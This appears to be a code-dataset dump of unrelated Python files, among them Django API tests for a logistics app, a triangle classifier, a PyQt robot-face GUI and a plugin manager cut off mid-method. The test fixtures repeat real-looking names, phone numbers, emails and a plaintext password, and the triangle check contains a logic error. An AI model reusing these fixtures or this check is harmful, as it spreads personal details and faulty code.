login_response = client.post(path="/v1/login", data=login_payload,
content_type="application/json",
HTTP_SECRET=settings.TEST_SECRET, follow=True,
secure=False, HTTP_ACCEPT='application/json', )
driver_response = client.post(path="/v1/users/drivers", data=driver_payload, follow=True,
secure=False,
HTTP_ACCEPT='application/json',
content_type="application/json",
HTTP_SECRET=settings.TEST_SECRET,
HTTP_Token=login_response.json()['data'][
'accessToken']
)
print(driver_response)
company = LogisticCompanies.objects.first()
driver = Drivers.objects.get(user_name="simlogistics")
stop = Stops.objects.create(
id=int(str(uuid.uuid4().int)[::6]),
sender_name='Simeon Umoh',
sender_address='14 Ogidi Crescent, Lagos',
sender_phone='08099514739',
sender_email='simeoneumoh@gmail.com',
receiver_name='Matthew Odeyemi',
receiver_address='Plot 8 the Providence Street',
receiver_phone='08160267172',
receiver_email='mattode@outlook.com',
vehicle_type='motorcycle',
additional_note='apartment',
stop_time_window='50',
load_capacity='large',
stop_duration='10',
priority_level='normail',
driver=driver,
company=company
)
stop.save()
def test_createStop(self):
login_payload = {
"userIdentity": "08099514739",
"password": "mickey01",
}
login_response = client.post(path="/v1/login?user_type=staff", data=login_payload,
content_type="application/json", HTTP_Secret=secret,
)
driverId = Drivers.objects.get(user_name="simlogistics").id
payload = {
"senderName": "Simeon Umoh",
"senderAddress": "14 Ogidi Crescent, Lagos",
"senderPhone": "08099514739",
"senderEmail": "simeoneumoh@gmail.com",
"receiverName": "Matthew Odeyemi",
"receiverAddress": "Plot 8 the Providence Street",
"receiverPhone": "08160267172",
"receiverEmail": "mattode@outlook.com",
"vehicleType": "motorcycle",
"additionalNote": "Bring to the apartment",
"stopTimeWindow": "50",
"driverId": driverId,
"loadCapacity": "large",
"stopDuration": "10",
"priorityLevel": "normal"
}
response = client.post('/v1/stops', payload,
content_type=content_type,
HTTP_Token=login_response.json()[
'data']['accessToken']
)
# Check that the response is 200 OK.
self.assertEqual(response.status_code, 200)
def test_retrieveCompanyStops(self):
login_payload = {
"userIdentity": "08099514739",
"password": "mickey01",
}
login_response = client.post(path="/v1/login?user_type=staff", data=login_payload,
content_type="application/json", HTTP_Secret=secret,
)
response = client.get('/v1/stops',
content_type=content_type,
HTTP_Token=login_response.json()[
'data']['accessToken']
)
# Check that the response is 200 OK.
self.assertEqual(response.status_code, 200)
def test_updateStop(self):
login_payload = {
"userIdentity": "08099514739",
"password": "mickey01",
}
login_response = client.post(path="/v1/login?user_type=staff", data=login_payload,
content_type="application/json", HTTP_Secret=secret,
)
stopId = Stops.objects.first().id
driverId = Drivers.objects.get(user_name="simlogistics").id
payload = {
"senderName": "Simeon Umoh",
"senderAddress": "14 Ogidi Crescent, Lagos",
"senderPhone": "08099514739",
"senderEmail": "simeoneumoh@gmail.com",
"receiverName": "Matthew Odeyemi",
"receiverAddress": "Plot 8 the Providence Street",
"receiverPhone": "08160267172",
"receiverEmail": "mattode@outlook.com",
"vehicleType": "motorcycle",
"additionalNote": "Bring to the apartment",
"stopTimeWindow": "50",
"driverId": driverId,
"loadCapacity": "large",
"stopDuration": "10",
"priorityLevel": "normal"
}
response = client.put(f'/v1/stops/{stopId}', payload,
content_type=content_type,
HTTP_Token=login_response.json()[
'data']['accessToken']
)
# Check that the response is 200 OK.
self.assertEqual(response.status_code, 200)
def test_updateStopStatus(self):
login_payload = {
"userIdentity": "08099514739",
"password": "mickey01",
}
login_response = client.post(path="/v1/login?user_type=staff", data=login_payload,
content_type="application/json", HTTP_Secret=secret,
)
print(login_response.status_code)
stopId = Stops.objects.first().id
payload = {
"feedback": "Completed"
}
response = client.put(f'/v1/stops/{stopId}?status=arrived', payload,
content_type=content_type,
HTTP_Token=login_response.json()[
'data']['accessToken']
)
# Check that the response is 200 OK.
self.assertEqual(response.status_code, 200)
def test_retrieveStop(self):
login_payload = {
"userIdentity": "08099514739",
"password": "mickey01",
}
login_response = client.post(path="/v1/login?user_type=staff", data=login_payload,
content_type="application/json", HTTP_Secret=secret,
)
stopId = Stops.objects.first().id
response = client.get(f'/v1/stops/{stopId}',
content_type=content_type,
HTTP_Token=login_response.json()[
'data']['accessToken']
)
# Check that the response is 200 OK.
self.assertEqual(response.status_code, 200)
def test_deleteStop(self):
login_payload = {
"userIdentity": "08099514739",
"password": "mickey01",
}
login_response = client.post(path="/v1/login?user_type=staff", data=login_payload,
content_type="application/json", HTTP_Secret=secret,
)
stopId = Stops.objects.first().id
response = client.delete(f'/v1/stops/{stopId}',
content_type=content_type,
HTTP_Token=login_response.json()[
'data']['accessToken']
)
# Check that the response is 200 OK.
self.assertEqual(response.status_code, 200)
class FeedbackTest(TestCase):
"""feedback test begin"""
@classmethod
def setUpTestData(cls):
company = LogisticCompanies.objects.create(
id=1,
name="First Company",
email="test@mail.com",
phone="08123456789",
address="address",
city="city",
state="state",
country="country",
logo="logo",
description="description",
motto="motto",
paid_until="2021-08-08",
created_at=datetime.now()
)
company.save()
resources = ResourceCategories.list()
operations = Operations.list()
permissions = {resource: operations for resource in resources}
role = createStaffRole(
"company_admin",
permissions,
company
)
role.save()
driver = Drivers.objects.create(
id=int(str(uuid.uuid4().int)[::6]),
first_name="Benevolent",
last_name="Gand",
user_name="bcx",
phone="08111111111",
email="test@mail.com",
password=make_password("password"),
role=role,
company=company,
created_at=datetime.now()
)
driver.save()
stop = Stops.objects.create(
id=int(str(uuid.uuid4().int)[::6]),
sender_name='Simeon Umoh',
sender_address='14 Ogidi Crescent, Lagos',
sender_phone='08099514739',
sender_email='simeoneumoh@gmail.com',
receiver_name='Matthew Odeyemi',
receiver_address='Plot 8 the Providence Street',
receiver_phone='08160267172',
receiver_email='mattode@outlook.com',
vehicle_type='motorcycle',
additional_note='apartment',
stop_time_window='50',
load_capacity='large',
stop_duration='10',
priority_level='normail',
driver=driver,
company=company
)
stop.save()
stop_feedback = StopFeedback.objects.create(
message="This is an automated message",
# file=file,
stop=stop
)
stop_feedback.save()
def test_create_stop_feedback(self):
"""pass"""
browser = Client()
login_payload = {
"userIdentity": "bcx",
"password": "password",
}
stop = Stops.objects.get(receiver_phone='08160267172').id
feedback_payload = {
"message": "message",
"stop": stop
}
login_response = browser.post(path="/v1/login?user_type=staff", data=login_payload,
content_type="application/json",
HTTP_SECRET=settings.TEST_SECRET, follow=True,
secure=False, HTTP_ACCEPT='application/json', )
response = browser.post(path="/v1/stops/feedback", data=feedback_payload,
follow=True, secure=False,
HTTP_ACCEPT='application/json',
content_type="application/json",
HTTP_SECRET=settings.TEST_SECRET,
HTTP_Token=login_response.json()['data'][
'accessToken']
)
self.assertEqual(response.status_code, 200)
def test_get_all_stop_feedbacks(self):
browser = Client()
login_payload = {
"userIdentity": "bcx",
"password": "password",
}
login_response = browser.post(path="/v1/login?user_type=staff", data=login_payload, content_type="application/json",
HTTP_SECRET=settings.TEST_SECRET, follow=True, secure=False,
HTTP_ACCEPT='application/json', )
response = browser.get(path="/v1/stops/feedback", follow=True, secure=False,
HTTP_ACCEPT='application/json', content_type="application/json",
HTTP_SECRET=settings.TEST_SECRET,
HTTP_Token=login_response.json()['data']['accessToken'])
self.assertEqual(response.status_code, 200)
def test_retrieve_stop_feedback(self):
"""pass"""
browser = Client()
login_payload = {
"userIdentity": "bcx",
"password": "password",
}
login_response = browser.post(path="/v1/login?user_type=staff", data=login_payload,
content_type="application/json",
HTTP_SECRET=settings.TEST_SECRET, follow=True,
secure=False, HTTP_ACCEPT='application/json', )
feedback_id = StopFeedback.objects.first().id
response = browser.get(path="/v1/stops/feedback/{}".format(feedback_id), follow=True,
secure=False,
HTTP_ACCEPT='application/json', content_type="application/json",
HTTP_SECRET=settings.TEST_SECRET,
HTTP_Token=login_response.json()['data']['accessToken']
)
self.assertEqual(response.status_code, 200)
# def test_delete_stop_feedback(self):
# """pass"""
# browser = Client()
# login_payload = {
# "userIdentity": "bcx",
# "password": "password",
# }
# login_response = browser.put(path="/v1/login?user_type=staff", data=login_payload,
# content_type="application/json",
# HTTP_SECRET=settings.TEST_SECRET, follow=True,
# secure=False, HTTP_ACCEPT='application/json', )
# feedback_id = StopFeedback.objects.first().id
# response = browser.delete(path="/v1/stop/feedback/{}".format(feedback_id),
# follow=True, secure=False,
# HTTP_ACCEPT='application/json',
# content_type="application/json",
# HTTP_SECRET=settings.TEST_SECRET,
# HTTP_Token=login_response.json()['data'][
# 'accessToken']
# )
# self.assertEqual(response.status_code, 200)
| 16,569 | 4,566 |
r1 = float(input('Primeiro segmento: '))
r2 = float(input('Segundo segmento: '))
r3 = float(input('Terceiro segmento: '))
if r1 < r2 + r3 and r2 < r1 + r3 and r3 < r2 + r3:
print('Você \033[32mpode\033[m formar um triângulo. ', end='')
if r1 == r2 == r3:
print(f'Seu triângulo é \033[36mequilátero\033[m.')
elif r1 != r2 != r3 != r1:
print(f'Seu triângulo é \033[36mescaleno\033[m.')
else:
print(f'Seu triângulo é \033[36misósceles\033[m.')
else:
print('Você \033[31mnão pode\033[m formar um triângulo.')
| 550 | 275 |
"""Mimic main window."""
import tkinter as tk
from mimic.EventEmitter import EventEmitter
from mimic.GUI.AbstractTkinterWindow import AbstractTkinterWindow
from mimic.GUI.Widgets.QRCode import QRCodeImage
from mimic.Utils.Host import resolve_host
class MainWindow(AbstractTkinterWindow, EventEmitter):
"""Mimic main window."""
widgets: list[tk.Widget] = []
def __init__(self, master: tk.Tk):
"""
Attaches main window to the main Tkinter instance.
Should only pass the amin Tkinter instance as the `master`.
I don't knwo what will happen if we try to nest windows inside
eachother.
Args:
master (tk.Tk): Master Tkinter instance
"""
super().__init__(master)
self.master = master
self.title("Mimic")
self.hide()
self.create_widgets()
# Hide when the close button ("x button") is clicked
self.protocol("WM_DELETE_WINDOW", self.hide)
def create_widgets(self):
"""Register widgets to window."""
qr_code = QRCodeImage(self, f"https://{resolve_host()}:8080")
qr_code.pack()
| 1,158 | 364 |
from django.conf import settings
from django.template.loader import render_to_string
import ConfigParser
from collections import OrderedDict
import sys
from Crypto.PublicKey import RSA
class AllowsSameKeys(OrderedDict):
def __setitem__(self, key, value):
if isinstance(value, list) and key in self:
self[key].extend(value)
else:
super(OrderedDict, self).__setitem__(key, value)
c = ConfigParser.ConfigParser(dict_type=AllowsSameKeys)
c.readfp(open(sys.argv[1]))
# django snippet 646, raise an Exception missing var
class InvalidVarException(object):
def __mod__(self, missing):
try:
missing_str=unicode(missing)
except:
missing_str='Failed to create string representation'
raise Exception('Unknown template variable %r %s' % (missing, missing_str))
def __contains__(self, search):
if search=='%s':
return True
return False
settings.configure(TEMPLATE_DIRS=('uwsgi_it_api/templates',), TEMPLATE_STRING_IF_INVALID=InvalidVarException())
rsa_key = RSA.generate(2048).exportKey()
container = {
'name': '30000',
'hostname': c.get('uwsgi','api_domain')[0].replace('.','-'),
'uid': 30000,
'ip': '10.0.0.2',
'server': {
'hd':c.get('uwsgi','api_hd')[0],
'etc_resolv_conf_lines': c.get('uwsgi','api_resolvconf'),
'etc_hosts_lines': c.get('uwsgi','api_hosts'),
},
'quota': 20 * 1024 * 1024 * 1024,
'memory_limit_in_bytes': 1024 * 1024 * 1024,
'distro': {'path': 'precise'},
'quota_threshold': 90,
'ssh_keys': c.get('uwsgi','api_ssh_key'),
'customer': {
'rsa_key_lines': rsa_key.split('\n'),
'rsa_pubkey_lines': RSA.importKey(rsa_key).publickey().exportKey().split('\n'),
},
}
print render_to_string('vassal.ini', {'container': container})
| 1,857 | 656 |
import argparse
import os
import os.path as osp
import torch
import torch.nn as nn
import torch.optim as optim
from eval import evaluate
from ever.core.iterator import Iterator
from module.deeplabv2 import Deeplab
from torch.nn import functional as fn
from tqdm import tqdm
from data.loveda import LoveDALoader
from utils.tools import (
adjust_learning_rate,
count_model_parameters,
get_console_file_logger,
import_config,
loss_calc,
seed_torch,
)
parser = argparse.ArgumentParser(description='Run Baseline methods.')
parser.add_argument('--config_path', type=str, help='config path')
args = parser.parse_args()
cfg = import_config(args.config_path)
def main():
"""Create the model and start the training."""
os.makedirs(cfg.SNAPSHOT_DIR, exist_ok=True)
logger = get_console_file_logger(name='Deeplabv2', logdir=cfg.SNAPSHOT_DIR)
# Create Network
model = Deeplab(nn.BatchNorm2d, num_classes=7)
# model = Deeplabv2(
# dict(
# backbone=dict(
# resnet_type='resnet50',
# output_stride=16,
# pretrained=True,
# ),
# multi_layer=False,
# cascade=False,
# use_ppm=False,
# ppm=dict(
# num_classes=7,
# use_aux=False,
# norm_layer=nn.BatchNorm2d,
# ),
# inchannels=2048,
# num_classes=7))
model.train()
model.cuda()
#cudnn.enabled = True
#cudnn.benchmark = True
logger.info('exp = %s' % cfg.SNAPSHOT_DIR)
count_model_parameters(model, logger)
trainloader = LoveDALoader(cfg.SOURCE_DATA_CONFIG)
epochs = cfg.NUM_STEPS_STOP / len(trainloader)
logger.info('epochs ~= %.3f' % epochs)
trainloader_iter = Iterator(trainloader)
optimizer = optim.SGD(
model.parameters(), lr=cfg.LEARNING_RATE, momentum=cfg.MOMENTUM, weight_decay=cfg.WEIGHT_DECAY)
# model, optimizer = amp.initialize(model, optimizer, opt_level="O1")
optimizer.zero_grad()
for i_iter in tqdm(range(cfg.NUM_STEPS_STOP)):
optimizer.zero_grad()
lr = adjust_learning_rate(optimizer, i_iter, cfg)
# Train with Source
batch = trainloader_iter.next()
images_s, labels_s = batch[0]
pred_source = model(images_s.cuda())
# pred_source is a dict with features and actual output
pred_source = pred_source["out"]
pred_source = fn.interpolate(pred_source, labels_s["cls"].size()[1:], mode="bilinear", align_corners=True)
#Segmentation Loss
loss = loss_calc(pred_source, labels_s['cls'].cuda())
loss.backward()
optimizer.step()
if i_iter % 50 == 0:
logger.info('exp = {}'.format(cfg.SNAPSHOT_DIR))
text = 'iter = %d, loss_seg = %.3f, lr = %.3f' % (i_iter, loss, lr)
logger.info(text)
if i_iter >= cfg.NUM_STEPS_STOP - 1:
print('save model ...')
ckpt_path = osp.join(cfg.SNAPSHOT_DIR, cfg.TARGET_SET + str(cfg.NUM_STEPS_STOP) + '.pth')
torch.save(model.state_dict(), ckpt_path)
evaluate(model, cfg, True, ckpt_path, logger)
break
if i_iter % cfg.EVAL_EVERY == 0 and i_iter != 0:
ckpt_path = osp.join(cfg.SNAPSHOT_DIR, cfg.TARGET_SET + str(i_iter) + '.pth')
torch.save(model.state_dict(), ckpt_path)
evaluate(model, cfg, True, ckpt_path, logger)
model.train()
if __name__ == '__main__':
seed_torch(2333)
main()
| 3,561 | 1,271 |
import os
def beforeSaveFile(fname):
'''makesure the path exists before save file'''
dirname = os.path.dirname(fname)
if not os.path.exists(dirname):
os.makedirs(dirname)
| 201 | 70 |
# Generated by Django 2.2 on 2019-04-22 13:45
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
('projects', '0030_allow_null_in_projects_groups_and_layers_file'),
]
operations = [
migrations.CreateModel(
name='Estimator',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('uuid', models.UUIDField(default=uuid.uuid4, editable=False, unique=True)),
('estimator_type', models.CharField(choices=[('OD', 'Object detection')], default='OD', max_length=2, verbose_name='estimator type')),
('name', models.CharField(max_length=255, verbose_name='name')),
('metadata', django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True)),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='created at')),
('updated_at', models.DateTimeField(auto_now=True, verbose_name='updated at')),
('project', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='projects.Project', verbose_name='project')),
],
options={
'unique_together': {('project', 'estimator_type', 'name')},
},
),
]
| 1,478 | 444 |
from pathlib import Path
from typing import Callable, Iterable, Iterator, List
from itertools import chain, cycle, islice, repeat
import numpy as np
BASE_PATTERN = [0, 1, 0, -1]
def read_lines() -> Iterator[str]:
with (Path(__file__).parent / "input.txt").open("r") as f:
for line in f:
yield line.rstrip()
def get_inputs() -> Iterator[int]:
line = list(read_lines())[0]
for i in line:
yield int(i)
def repeat_each(pattern, repeats: int):
return chain(*map(lambda i: repeat(i, repeats), pattern))
def generate_pattern(base: Iterable[int], repeats: int, length: int) -> Iterator[int]:
"""Generate the pattern as specified by the algorithm.
Example:
>>> list(generate_pattern([0, 1, 0, -1], 2, 15))
[0, 1, 1, 0, 0, -1, -1, 0, 0, 1, 1, 0, 0, -1, -1]
"""
return islice(cycle(repeat_each(base, repeats)), 1, length + 1)
def create_filter_matrix(length: int) -> np.array:
return np.array(
[list(generate_pattern(BASE_PATTERN, i + 1, length)) for i in range(length)]
)
def create_input_vector() -> np.array:
return np.array(list(get_inputs()))
def create_last_digit_filter() -> Callable:
return np.vectorize(lambda i: abs(i) % 10)
def perform_fft(iterations: int) -> np.array:
vector = create_input_vector()
filter_matrix = create_filter_matrix(len(vector))
last_digit_filter = create_last_digit_filter()
for _ in range(iterations):
vector = last_digit_filter(filter_matrix @ vector)
return vector
# print(list(generate_pattern(2, 10)))
print(perform_fft(100)[:8]) | 1,607 | 587 |
from bs4 import BeautifulSoup
import urllib2
start_url="https://www.fictionpress.com/s/2780124/1/Rise-From-The-Ashes-OLD" #start url
end =False
split_url=start_url.split("/")
new_url=""
for i in range(5):
new_url=new_url+split_url[i]+"/"
i=1
while not (end):
url=new_url+"/"+str(i)+"/"
i=i+1
response=urllib2.urlopen(url)
html_text=response.read()
response.close()
foo=open("fiction.txt","a")##File path where you want to save this file
soup=BeautifulSoup(html_text)
raw_story = soup.select("div > #storytext > p ")
if raw_story:
title = raw_story[0].get_text()
print title
for line in raw_story:
foo.write(line.get_text().encode('utf-8')+"\n")
foo.write("\n ----><-----\n\n\n")
else:
print "<--the end-->"
end=True
foo.write("\n------------~~~~~~~~~--------------")
foo.close()
| 925 | 351 |
"""
Copyright (c) 2021 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pytest
from tests.tensorflow.helpers import create_compressed_model_and_algo_for_test
from tests.tensorflow.pruning.helpers import get_basic_pruning_config
from tests.tensorflow.pruning.helpers import get_test_model_shared_convs
@pytest.mark.parametrize(
("model", "all_weights", "ref_full_flops", "ref_current_flops",
"ref_full_params", "ref_current_params"),
(
(get_test_model_shared_convs, True, 461438976, 276385312,
11534848, 6908711),
(get_test_model_shared_convs, False, 461438976, 270498816,
11534848, 6761608)
)
)
def test_flops_calulation_for_spec_layers(model, all_weights, ref_full_flops, ref_current_flops,
ref_full_params, ref_current_params):
config = get_basic_pruning_config(8)
config['compression']['algorithm'] = 'filter_pruning'
config['compression']['pruning_init'] = 0.4
config['compression']['params']['pruning_flops_target'] = 0.4
config['compression']['params']['prune_first_conv'] = True
config['compression']['params']['prune_last_conv'] = True
config['compression']['params']['all_weights'] = all_weights
input_shape = [1, 8, 8, 1]
model = model(input_shape)
model.compile()
_, compression_ctrl = create_compressed_model_and_algo_for_test(model, config)
assert compression_ctrl.full_flops == ref_full_flops
assert compression_ctrl.full_params_num == ref_full_params
assert compression_ctrl.current_flops == ref_current_flops
assert compression_ctrl.current_params_num == ref_current_params
| 2,161 | 734 |
from .style import LineStyle
__all__ = [
"LineStyle",
]
| 61 | 23 |
"""
Dpoom Face Expression Windows 2019
"""
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtWebEngineWidgets import *
from PyQt5.QtPrintSupport import *
import fall_body_1013 as fall_body
import os
import sys
import numpy as np
import argparse
import imutils
import time
import cv2
import os
import pyrealsense2 as rs
import threading
import matplotlib.pyplot as plt
import uuid
import queue
specificSet = [
'/Users/shinkansan/anaconda3/envs/HyunSoo/lib/python36.zip',
'/Users/shinkansan/anaconda3/envs/HyunSoo/lib/python3.6',
'/Users/shinkansan/anaconda3/envs/HyunSoo/lib/python3.6/lib-dynload',
'/Users/shinkansan/anaconda3/envs/HyunSoo/lib/python3.6/site-packages']
#sys.path = specificSet
MainIndex = "file:///home/dpoom2/dpoom_few/index.html"
class AboutDialog(QDialog):
def __init__(self, *args, **kwargs):
super(AboutDialog, self).__init__(*args, **kwargs)
QBtn = QDialogButtonBox.Ok # No cancel
self.buttonBox = QDialogButtonBox(QBtn)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.reject)
layout = QVBoxLayout()
title = QLabel("DPoom FEW")
font = title.font()
font.setPointSize(20)
title.setFont(font)
layout.addWidget(title)
layout.addWidget(QLabel("Version 1"))
layout.addWidget(QLabel("Copyright TEAM DPOOM."))
for i in range(0, layout.count()):
layout.itemAt(i).setAlignment(Qt.AlignHCenter)
layout.addWidget(self.buttonBox)
self.setLayout(layout)
class MainWindow(QMainWindow):
thread_signal = pyqtSignal()
send_instances_signal = pyqtSignal("PyQt_PyObject")
def __init__(self, *args, **kwargs):
super(MainWindow, self).__init__(*args, **kwargs)
self.status_emeregency = False
self.browser = QWebEngineView()
self.browser.setUrl(QUrl(MainIndex))
self.browser.urlChanged.connect(self.update_urlbar)
self.browser.loadFinished.connect(self.update_title)
self.browser.loadFinished.connect(self.setDefaultExpr)
self.setCentralWidget(self.browser)
self.status = QStatusBar()
self.setStatusBar(self.status)
navtb = QToolBar("Navigation")
navtb.setIconSize(QSize(16, 16))
#self.addToolBar(navtb)
back_btn = QAction("Back", self)
back_btn.setStatusTip("Back to previous page")
back_btn.triggered.connect(self.browser.back)
navtb.addAction(back_btn)
next_btn = QAction(QIcon(os.path.join('images', 'arrow-000.png')), "Forward", self)
next_btn.setStatusTip("Forward to next page")
next_btn.triggered.connect(self.browser.forward)
navtb.addAction(next_btn)
reload_btn = QAction(QIcon(os.path.join('images', 'arrow-circle-315.png')), "Reload", self)
reload_btn.setStatusTip("Reload page")
reload_btn.triggered.connect(self.browser.reload)
navtb.addAction(reload_btn)
home_btn = QAction(QIcon(os.path.join('images', 'home.png')), "Home", self)
home_btn.setStatusTip("Go home")
home_btn.triggered.connect(self.navigate_home)
navtb.addAction(home_btn)
navtb.addSeparator()
self.urlbar = QLineEdit()
self.urlbar.returnPressed.connect(self.navigate_to_url)
navtb.addWidget(self.urlbar)
stop_btn = QAction( "Stop", self)
stop_btn.setStatusTip("Stop loading current page")
stop_btn.triggered.connect(self.browser.stop)
navtb.addAction(stop_btn)
# Uncomment to disable native menubar on Mac
# self.menuBar().setNativeMenuBar(False)
file_menu = self.menuBar().addMenu("&File")
open_file_action = QAction( "Open file...", self)
open_file_action.setStatusTip("Open from file")
open_file_action.triggered.connect(self.open_file)
file_menu.addAction(open_file_action)
# save_file_action = QAction(QIcon(os.path.join('images', 'disk--pencil.png')), "Save Page As...", self)
# save_file_action.setStatusTip("Save current page to file")
# save_file_action.triggered.connect(self.save_file)
# file_menu.addAction(save_file_action)
# print_action = QAction(QIcon(os.path.join('images', 'printer.png')), "Print...", self)
# print_action.setStatusTip("Print current page")
# print_action.triggered.connect(self.print_page)
#file_menu.addAction(print_action)
about_action = QAction("Specif Setting", self)
about_action.setStatusTip("detail") # Hungry!
about_action.triggered.connect(self.about)
file_menu.addAction(about_action)
navigate_mozarella_action = QAction("Go Homepage", self)
navigate_mozarella_action.setStatusTip("Go to Dpoom home")
navigate_mozarella_action.triggered.connect(self.navigate_mozarella)
file_menu.addAction(navigate_mozarella_action)
self.showFullScreen()
self.show()
self.th = Worker(parent=self)
self.th.start()
self.th2 = YoloWorker(parent=self)
self.th2.start()
self.setWindowIcon(QIcon(os.path.join('images', 'ma-icon-64.png')))
def setDefaultExpr(self):
self.browser.page().runJavaScript("eyes.startBlinking()")
print('set default expr')
def setExpr(self, classN):
emoClass = {
0:"eyes.startBlinking()",
1:"eyes.stopBlinking()",
2:"eyes.blink()",
3:"eyes.express({type: 'happy'})",
4:"eyes.express({type: 'sad'})",
5:"eyes.express({type: 'angry'})",
6:"eyes.express({type: 'focused'})",
7:"eyes.express({type: 'confused'})"
}
self.browser.page().runJavaScript(emoClass.get(classN))
pass
def declareEmergency(self):
self.status_emeregency = not self.status_emeregency
if self.status_emeregency:
self.browser.page().runJavaScript('clearInterval(light)')
self.browser.page().runJavaScript('var light = setInterval("lightning()",360);')
else:
self.browser.page().runJavaScript('clearInterval(light)')
self.browser.page().runJavaScript('var light = setInterval("getBackwhite()",360);')
def update_title(self):
title = self.browser.page().title()
self.setWindowTitle("Dpoom FEW")
def navigate_mozarella(self):
self.browser.setUrl(MainIndex)
def about(self):
dlg = AboutDialog()
dlg.exec_()
def open_file(self):
filename, _ = QFileDialog.getOpenFileName(self, "Open file", "",
"Hypertext Markup Language (*.htm *.html);;"
"All files (*.*)")
if filename:
with open(filename, 'r') as f:
html = f.read()
self.browser.setHtml(html)
self.urlbar.setText(filename)
def save_file(self):
filename, _ = QFileDialog.getSaveFileName(self, "Save Page As", "",
"Hypertext Markup Language (*.htm *html);;"
"All files (*.*)")
if filename:
html = self.browser.page().toHtml()
with open(filename, 'w') as f:
f.write(html)
def print_page(self):
dlg = QPrintPreviewDialog()
dlg.paintRequested.connect(self.browser.print_)
dlg.exec_()
def navigate_home(self):
self.browser.setUrl(QUrl(""))
def navigate_to_url(self): # Does not receive the Url
q = QUrl(self.urlbar.text())
if q.scheme() == "":
q.setScheme("http")
self.browser.setUrl(q)
def update_urlbar(self, q):
if q.scheme() == 'https':
# Secure padlock icon
pass
else:
# Insecure padlock icon
pass
#self.urlbar.setText(q.toString())
#self.urlbar.setCursorPosition(0)
class Worker(QThread):
#sec_changed = pyqtSignal(str)
def __init__(self, sec=0, parent=None):
super(Worker, self).__init__()
self.main = parent
self.working = True
self.sec = sec
# self.main.add_sec_signal.connect(self.add_sec) # custom signal from main thread to worker thread
def __del__(self):
print(".... end thread.....")
self.wait()
def defaultAction(self):
while(True):
if fall_body.fallFlag:
print("fall body detected!!!!!!!")
elif fall_body.humanFlag:
print("human detected !!!")
###cascade_1013
emoNumber= int(np.random.uniform(3, 8))
try:
emoNumber = int(emoNumber)
except:
pass
#window.about()
else:
window.setExpr(int(emoNumber))
time.sleep(3)
print('active')
def run(self):
self.defaultAction();
class YoloWorker(QThread):
def __init__(self, parent=None):
super(YoloWorker, self).__init__()
self.main = parent
self.working = True
def __del__(self):
print('yolo thread dead')
self.wait()
def yolo_main(self):
print('yolo thread working')
if self.working:
self.working = not self.working
fall_body.main(verbose=0)
def run(self):
self.yolo_main()
app = QApplication(sys.argv)
app.setApplicationName("Dpoom FEW")
app.setOrganizationName("Dpoom FEW")
app.setOrganizationDomain("github.com/shinkansan")
window = MainWindow()
app.exec_()
| 9,812 | 3,153 |
"""
sentry.plugins.base.manager
~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2013 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import, print_function
__all__ = ('PluginManager', )
import sys
import os
import six
import logging
import click
import importlib
from clims.handlers import HandlerManager
from sentry.utils.managers import InstanceManager
from sentry.utils.safe import safe_execute
from django.conf import settings
from django.db import transaction
from django.db.utils import ProgrammingError
logger = logging.getLogger(__name__)
class PluginManager(object):
"""
Handles plugins.
Plugins need to be installed via a call to `lims upgrade`. This will install all plugins
that are found in the application at the time.
When a plugin is found in the environment, it's installed, i.e. added to the database.
After that, it needs to exist on load time from there on. It's currently not supported to
uninstall a plugin.
When the application loads, it will load all plugins that exist in the database.
"""
def __init__(self, app, instance_manager=None):
self._app = app
self.handlers = HandlerManager(app)
self.work_types = dict() # TODO: Add to a manager class
self.instance_manager = instance_manager or InstanceManager()
# Install (during upgrade)
def auto_install(self):
"""
Installs all plugins that can be found in the Python environment. An entry for the plugin
and version is created in the database.
"""
logger.info("Auto installing plugins found in environment")
plugins = self.find_all_plugins_in_scope()
self.install_plugins(*plugins)
def install_plugins(self, *plugins):
"""
Installs the plugins in the backend. Plugins can not be loaded before they have been
installed.
"""
for plugin in plugins:
logger.info("Installing plugin class '{}'".format(plugin.get_name_and_version()))
with transaction.atomic():
plugin_reg = self.install_plugin(plugin)
self.install_extensible_types(plugin)
self.install_workflows_in_plugin(plugin, plugin_reg)
def install_workflows_in_plugin(self, plugin_cls, plugin_reg):
"""
Installs workflow definitions found in the plugin.
"""
logger.info("Loading workflows for plugin class {}".format(plugin_cls))
definitions = list(plugin_cls.get_process_definitions())
logger.info("Found {} workflow definitions for plugin class {}".format(
len(definitions), plugin_cls))
for definition in definitions:
self._app.workflows.install(definition, plugin_reg)
def validate_version(self, plugin_cls):
if not plugin_cls.version:
raise PluginMustHaveVersion()
# Ensure that we can parse the string as a sortable tuple:
try:
parsed = plugin_cls.get_sortable_version()
logger.debug("Plugin {} has a valid version {} => {}".format(
plugin_cls, plugin_cls.version, parsed))
except ValueError:
raise PluginIncorrectVersionFormat(
"Plugin versions must be a list of dot separated numbers, e.g. 1.0.0")
def install_plugin(self, plugin_cls):
"""
Installs the plugin in the database.
This method should be called when upgrading the system, so the end-user is in control
of when a new model is available.
Returns a plugin registration model that represents the installation.
"""
# Make sure we have a plugin registration here:
from clims.models import PluginRegistration
self.validate_version(plugin_cls)
logger.debug("Recording plugin {} version={} in the database".format(
plugin_cls.get_full_name(), plugin_cls.version))
reg, _ = PluginRegistration.objects.get_or_create(
name=plugin_cls.get_full_name(), version=plugin_cls.version)
return reg
def install_extensible_types(self, plugin):
"""
Installs all the extensible types found in the plugin. These are for example specific
Plates, Projects and Samples defined by the plugin developers.
"""
logger.info("Installing extensible types found in plugin class '{}'".format(
plugin.get_name_and_version()))
from clims.models import PluginRegistration
